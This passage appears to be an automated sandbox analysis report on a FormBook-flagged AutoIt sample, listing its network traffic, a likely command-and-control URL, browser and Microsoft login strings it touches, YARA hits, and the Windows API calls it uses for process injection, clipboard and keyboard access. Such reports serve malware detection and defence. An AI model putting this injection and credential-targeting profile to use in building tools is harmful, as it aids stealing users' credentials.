Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:16 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>

Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lgdiamonds.info
Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lgdiamonds.info/cv1w/
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: rasdial.exe, 00000006.00000003.1891460073.00000000081FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0071EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_0071EAFF

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0071ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_0071ED6A

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

1_2_0071EAFF

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0070AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

1_2_0070AA57

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_00739576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_00739576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: cNDddMAF5u.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: cNDddMAF5u.exe, 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d19bfb2a-e
Source: cNDddMAF5u.exe, 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_de27639f-b
Source: cNDddMAF5u.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_51ba31f2-4
Source: cNDddMAF5u.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cd523b04-6

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042C8B3 NtClose,	3_2_0042C8B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72B60 NtClose,LdrInitializeThunk,	3_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C735C0 NtCreateMutant,LdrInitializeThunk,	3_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C74340 NtSetContextThread,	3_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C74650 NtSuspendThread,	3_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BE0 NtQueryValueKey,	3_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BF0 NtAllocateVirtualMemory,	3_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72B80 NtQueryInformationFile,	3_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BA0 NtEnumerateValueKey,	3_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AD0 NtReadFile,	3_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AF0 NtWriteFile,	3_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AB0 NtWaitForSingleObject,	3_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FE0 NtCreateFile,	3_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F90 NtProtectVirtualMemory,	3_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FA0 NtQuerySection,	3_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FB0 NtResumeThread,	3_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F60 NtCreateProcessEx,	3_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F30 NtCreateSection,	3_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72EE0 NtQueueApcThread,	3_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72E80 NtReadVirtualMemory,	3_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72EA0 NtAdjustPrivilegesToken,	3_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72E30 NtWriteVirtualMemory,	3_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DD0 NtDelayExecution,	3_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DB0 NtEnumerateKey,	3_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D00 NtSetInformationFile,	3_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D10 NtMapViewOfSection,	3_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D30 NtUnmapViewOfSection,	3_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CC0 NtQueryVirtualMemory,	3_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CF0 NtOpenProcess,	3_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CA0 NtQueryInformationToken,	3_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C60 NtCreateKey,	3_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C00 NtQueryInformationProcess,	3_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73090 NtSetValueKey,	3_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73010 NtOpenDirectoryObject,	3_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C739B0 NtGetContextThread,	3_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73D70 NtOpenThread,	3_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73D10 NtOpenProcessToken,	3_2_03C73D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05244650 NtSuspendThread,LdrInitializeThunk,	6_2_05244650
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05244340 NtSetContextThread,LdrInitializeThunk,	6_2_05244340
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_05242D30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_05242D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_05242DF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242DD0 NtDelayExecution,LdrInitializeThunk,	6_2_05242DD0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242C60 NtCreateKey,LdrInitializeThunk,	6_2_05242C60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_05242C70
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_05242CA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242F30 NtCreateSection,LdrInitializeThunk,	6_2_05242F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242FB0 NtResumeThread,LdrInitializeThunk,	6_2_05242FB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242FE0 NtCreateFile,LdrInitializeThunk,	6_2_05242FE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_05242E80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_05242EE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242B60 NtClose,LdrInitializeThunk,	6_2_05242B60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_05242BA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_05242BE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_05242BF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242AF0 NtWriteFile,LdrInitializeThunk,	6_2_05242AF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242AD0 NtReadFile,LdrInitializeThunk,	6_2_05242AD0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052435C0 NtCreateMutant,LdrInitializeThunk,	6_2_052435C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052439B0 NtGetContextThread,LdrInitializeThunk,	6_2_052439B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242D00 NtSetInformationFile,	6_2_05242D00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242DB0 NtEnumerateKey,	6_2_05242DB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242C00 NtQueryInformationProcess,	6_2_05242C00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242CF0 NtOpenProcess,	6_2_05242CF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242CC0 NtQueryVirtualMemory,	6_2_05242CC0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242F60 NtCreateProcessEx,	6_2_05242F60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242FA0 NtQuerySection,	6_2_05242FA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242F90 NtProtectVirtualMemory,	6_2_05242F90
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242E30 NtWriteVirtualMemory,	6_2_05242E30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242EA0 NtAdjustPrivilegesToken,	6_2_05242EA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242B80 NtQueryInformationFile,	6_2_05242B80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05242AB0 NtWaitForSingleObject,	6_2_05242AB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05243010 NtOpenDirectoryObject,	6_2_05243010
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05243090 NtSetValueKey,	6_2_05243090
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05243D10 NtOpenProcessToken,	6_2_05243D10
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05243D70 NtOpenThread,	6_2_05243D70
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03229710 NtDeleteFile,	6_2_03229710
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_032297B0 NtClose,	6_2_032297B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03229620 NtReadFile,	6_2_03229620
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_032294B0 NtCreateFile,	6_2_032294B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03229920 NtAllocateVirtualMemory,	6_2_03229920

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0070D5EB: CreateFileW,DeviceIoControl,CloseHandle,

1_2_0070D5EB

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_00701201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00701201

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0070E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_0070E8F6

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006ABF40	1_2_006ABF40
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006A8060	1_2_006A8060
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00712046	1_2_00712046
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00708298	1_2_00708298
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006DE4FF	1_2_006DE4FF
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006D676B	1_2_006D676B
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00734873	1_2_00734873
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006ACAF0	1_2_006ACAF0
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006CCAA0	1_2_006CCAA0
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006BCC39	1_2_006BCC39
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006D6DD9	1_2_006D6DD9
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006BD07D	1_2_006BD07D
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006BB119	1_2_006BB119
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006A91C0	1_2_006A91C0
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C1394	1_2_006C1394
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C1706	1_2_006C1706
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C781B	1_2_006C781B
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006B997D	1_2_006B997D
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006A7920	1_2_006A7920
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C19B0	1_2_006C19B0
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C7A4A	1_2_006C7A4A
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C1C77	1_2_006C1C77
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C7CA7	1_2_006C7CA7
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0072BE44	1_2_0072BE44
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006D9EEE	1_2_006D9EEE
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C1F32	1_2_006C1F32
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_016D6488	1_2_016D6488
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00418773	3_2_00418773
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041696F	3_2_0041696F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00416973	3_2_00416973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004101C3	3_2_004101C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040E1B3	3_2_0040E1B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004022FD	3_2_004022FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040E2FE	3_2_0040E2FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402300	3_2_00402300
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040E303	3_2_0040E303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402660	3_2_00402660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402E80	3_2_00402E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042EF33	3_2_0042EF33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FF9C	3_2_0040FF9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FFA3	3_2_0040FFA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D003E6	3_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA352	3_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC02C0	3_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF81CC	3_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF41A2	3_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D001AA	3_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC8158	3_2_03CC8158
